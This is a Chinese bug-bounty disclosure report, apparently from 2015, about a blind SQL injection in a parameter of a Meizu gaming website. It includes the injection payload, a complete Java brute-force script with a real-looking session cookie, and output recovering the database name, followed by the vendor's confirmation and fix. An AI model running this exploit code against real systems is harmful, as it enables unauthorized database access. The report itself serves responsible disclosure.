2015-09-27: 细节已通知厂商并且等待厂商处理中 2015-09-27: 厂商已经确认,细节仅向厂商公开 2015-10-07: 细节向核心白帽子及相关领域专家公开 2015-10-09: 厂商已经修复漏洞并主动公开,细节向公众公开
小锤抠缝,大锤搞定听闻魅族刚发了PRO 5手机,特来捧场(来个内部价可好)。
站点:http://wan.meizu.com漏洞URL:http://wan.meizu.com/praise/users/{此处为uuid}?version=20882&page=2列举一例:ad25a188-856d-4a55-be31-28d6ef605319构成URL:http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2注入点:versionpayload: 20882' AND SUBSTRING(database(),2,1)='1' -- ,需要对其进行URL编码后台存在IPS之类,写方法来验证,以下是代码段(将就着看看):
package com.test; import java.io.BufferedReader;import java.io.IOException;import java.io.InputStreamReader;import java.net.URL;import java.net.URLConnection;import java.net.URLEncoder; /** * @author 需求又改了 */public class MeizuRequest { /** * 发送get请求 * @param url 请求地址 * @param list 请求参数 * @return 请求结果 * @throws IOException */ public static String sendGet(String injectUrl) throws IOException { StringBuffer result = new StringBuffer(); URL httpUrl = null; URLConnection connection = null; BufferedReader bufferedReader; httpUrl = new URL(injectUrl); connection = httpUrl.openConnection(); connection.setRequestProperty("Host", "wan.meizu.com"); connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0"); connection.setRequestProperty("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"); connection.setRequestProperty("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3"); connection.setRequestProperty("Accept-Encoding", "utf-8"); connection.setRequestProperty("Cookie", "_ga=GA1.2.1012299308.1443151870; Hm_lvt_2a0c04774115b182994cfcacf4c122e9=1443152293; _uid=23733490; _keyLogin=ea5f7c9b137f2ad76d2ddcfda65d9f; _rmtk=721da5fdc3f245ce2ff2a563107292; _uticket=hBIjVSJpsYarGtdHErnitiNkuHQHhE01icUfMZ_ALKwt5wLG-6WqX_rkp9dyVE9WjQWst3qhyNNVkYYO7Mnx9-o6GLBVRf49cN4wp0r2NqlPNJ94UY2Ri-8zzYj_Kgf2RVrf0o5scF-pAdj6rmSNGzRK5822rYSqHMtfKG524Ao*ybD7tpf3TyGfVGH2XomvdQ; subnavShow=1; wan.sid=s%3Ahb0gXZI9zjzGxL5Pqtp1jFw6sfuWrKJx.7W3TsX28Ee0Qpr3H5sI%2BzSvYkcLmY99QGKhjfa%2BEKIM; Hm_lvt_1081764f96e05731190620c8597200c4=1443164252,1443241887; customer_service_language=cn; Hm_lpvt_1081764f96e05731190620c8597200c4=1443253378"); connection.setRequestProperty("Connection", "keep-alive"); connection.connect(); //接受连接返回参数 bufferedReader = new BufferedReader(new InputStreamReader(connection.getInputStream(),"utf-8")); String line; while ((line = bufferedReader.readLine()) != null) { result.append(line); } bufferedReader.close(); return result.toString(); } /** * 获取用户 * @param url * @param injectParam * @param userLen * @throws IOException */ public static void fetchUser(String url, String injectParam, int userLen) throws IOException { String paramsStr = url.split("\\?")[1]; char[] userChars = new char[userLen]; for(int u = 0; u<userChars.length; u++) { userChars[u]='X'; } if (!paramsStr.equals("") && !injectParam.equals("")) { String[] paramArr = paramsStr.split("&"); for(int i=0; i < paramArr.length; i++) { int eqIndex = paramArr[i].indexOf("="); String param = paramArr[i].substring(0, eqIndex).trim(); if(param.equals(injectParam.trim())) { char[] payloads = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z', '1','2','3','4','5','6','7','8','9','0','.',',','/','<','>','?',':',';','\"','\'','[',']','{','}','|','\\', '=','+','-','_',')','(','*','&','^','%','$','#','@','!','~'}; //char[] payloads = {'1','2','3','4','5','6','7','8','9','0',':','.'}; for(int j=0; j < payloads.length; j++) { //20882' AND SUBSTRING(database(),2,1)='1' -- String payload = URLEncoder.encode(String.valueOf(payloads[j]), "utf-8"); for(int k=0; k < userLen; k++) { String payloadStr = "20882%27%20AND%20SUBSTRING%28database%28%29%2C" + (k+1) + "%2C1%29%3D%27"+ payload +"%27%20--%20"; String injectUrl = url.replace(paramArr[i], param + "=" + payloadStr); String result = MeizuRequest.sendGet(injectUrl); if(result.indexOf("username") > 0) { userChars[k] = payloads[j]; System.out.println("database() the " + (k+1) + " place is " + payloads[j]); } else { if(k%userLen == 0) { System.out.print("\n."); } else { System.out.print("."); } } } } System.out.println("database() is " + String.valueOf(userChars)); } } } } /** * main method * @param args */ public static void main(String[] args) { String url = "http://wan.meizu.com/praise/users/ad25a188-856d-4a55-be31-28d6ef605319?version=20882&page=2"; //填写注入点和database()长度 try { MeizuRequest.fetchUser(url, "version", 3); } catch(Exception e) { System.out.println("获取数据库名异常"+e.getMessage()); e.printStackTrace(); } }}
其中MeizuRequest.fetchUser(url, "version", 3);的 3 是数据库的长度,盲注可判断,如下图:
运行结果:
.database() the 2 place is a.......................................database() the 3 place is n........................database() the 1 place is w......................................................................................................................................database() is wan
求高Rank,谢谢。结合业务做修复,你们更专业。
危害等级:高
漏洞Rank:12
确认时间:2015-09-27 14:14
感谢白帽子反馈问题,祝中秋快乐!
2015-10-09:修补完成。
内部价
